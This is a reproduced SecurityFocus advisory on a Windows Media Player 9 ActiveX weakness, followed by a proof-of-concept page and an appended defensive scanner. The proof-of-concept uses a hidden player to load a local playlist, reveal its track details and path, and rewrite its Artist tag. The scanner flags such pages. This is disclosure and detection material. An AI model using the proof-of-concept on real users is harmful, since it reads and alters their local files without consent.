
56 lines
No EOL
2.4 KiB
HTML
source: https://www.securityfocus.com/bid/12031/info

The Windows Media Player ActiveX control is prone to a security weakness. The issue is that the control may be abused by a Web page to change attributes of media files (such as MP3). An attacker can influence attributes such as the artist, song name, or album name.

It is possible to exploit this weakness to inject malicious script code into these attributes. If this issue was combined with a vulnerability that could force Internet Explorer to interpret the injected script code, it may be possible to execute malicious script code in the Local Zone. Such an attack would lead to execution of arbitrary code on computers that do not have this Zone locked down.

This issue is reported to affect Windows Media Player 9. It reportedly does not work on computers running Windows XP SP2 when the attack is executed from a remote source. This is likely due to additional browser security measures in Windows XP SP2.

<object style="display:none;"
        classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6"
        id="WindowsMediaPlayer">
  <param name="autoStart" value="1">
  <param name="url" value="file://c:\program files\winamp\winamp.m3u">
  <param name="mute" value="1">
</object>

<script>

note = 'Look at yourself and find the mortality of your body';

setTimeout(
  function(){
    if (WindowsMediaPlayer.currentMedia.sourceURL!='c:\\program files\\winamp\\winamp.m3u')
    {
      artist = WindowsMediaPlayer.currentMedia.getItemInfo("Artist");
      title = WindowsMediaPlayer.currentMedia.getItemInfo("Title");
      album = WindowsMediaPlayer.currentMedia.getItemInfo("Album");
      texxt = "";
      if (artist!=note)
      {
        if (artist!="")
          texxt='I like '+artist+'!\n';
        if (title!="")
          texxt=texxt+'I think '+title+' is the best song';
        if ((title!="")&&(album!=""))
          texxt=texxt+' from ';
        if (album!="")
          texxt=texxt+'My favorite album "'+album+'".\n';
        else
          texxt=texxt+'.\n';
        texxt=texxt+'I have it on my computer ('+WindowsMediaPlayer.currentMedia.sourceURL+'), I guess you have it too! ;)';
        alert(texxt);
      }
      WindowsMediaPlayer.currentMedia.setItemInfo("Artist",note);
      alert('done!\nplay '+WindowsMediaPlayer.currentMedia.sourceURL+' by a player and take a look at artist name, it must be changed!');
      WindowsMediaPlayer.controls.stop();
      WindowsMediaPlayer.controls.play();
    }
    else
      alert('Can\'t find winamp default playlist!\nMost probably the winamp is not installed in c:\\program files\\winamp directory.');
  }
,2000);
</script>

</body></html>
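
A defender-side check, added here and not part of the original advisory or proof of concept: a static heuristic in JavaScript (Node.js) that flags pages embedding the Windows Media Player control by the classid shown above, pointing it at a local `file:` URL, and calling `setItemInfo` on it. The function name `scanPage`, the rule names and the sample markup are assumptions constructed for this example.

```javascript
// Added example: static heuristic for pages that script the WMP ActiveX control.
const WMP_CLSID = '6BF52A52-394A-11D3-B153-00C04F79FAA6'; // classid from the page above

// Returns a list of findings ({rule, id, value?}) for one HTML document.
function scanPage(html) {
  const findings = [];
  const objectRe = /<object\b([^>]*)>([\s\S]*?)<\/object>/gi;
  const clsidRe = new RegExp('classid\\s*=\\s*["\']?clsid:' + WMP_CLSID, 'i');
  let m;
  while ((m = objectRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    if (!clsidRe.test(attrs)) continue;            // not the WMP control
    const idMatch = /\bid\s*=\s*["']?(\w+)/i.exec(attrs);
    const id = idMatch ? idMatch[1] : null;
    findings.push({ rule: 'wmp-activex-embedded', id });
    // A hidden player has no legitimate playback UI for the user.
    if (/display\s*:\s*none/i.test(attrs)) findings.push({ rule: 'wmp-hidden', id });
    // A web page loading local media is the precondition for rewriting its tags.
    const urlParam = /<param\b[^>]*name\s*=\s*["']?url["']?[^>]*value\s*=\s*["']?(file:[^"'>]*)/i.exec(body);
    if (urlParam) findings.push({ rule: 'wmp-local-file-url', id, value: urlParam[1] });
    // Script that writes metadata through the control's object id.
    if (id) {
      const writeRe = new RegExp('\\b' + id + '\\.currentMedia\\.setItemInfo\\s*\\(', 'i');
      if (writeRe.test(html)) findings.push({ rule: 'wmp-metadata-write', id });
    }
  }
  return findings;
}

// Constructed sample inputs (not taken from real traffic).
const SUSPICIOUS = `
<object style="display:none;" classid="clsid:${WMP_CLSID}" id="player">
  <param name="url" value="file:///C:/media/sample.m3u">
</object>
<script>player.currentMedia.setItemInfo("Artist", "x");</script>`;

const BENIGN = `
<object classid="clsid:${WMP_CLSID}" id="player">
  <param name="url" value="https://media.example/clip.wma">
</object>`;

console.log(scanPage(SUSPICIOUS).map(f => f.rule));
console.log(scanPage(BENIGN).map(f => f.rule));
```

A page that trips `wmp-local-file-url` together with `wmp-metadata-write` matches the pattern in this advisory; the embed rule alone also fires on ordinary media pages.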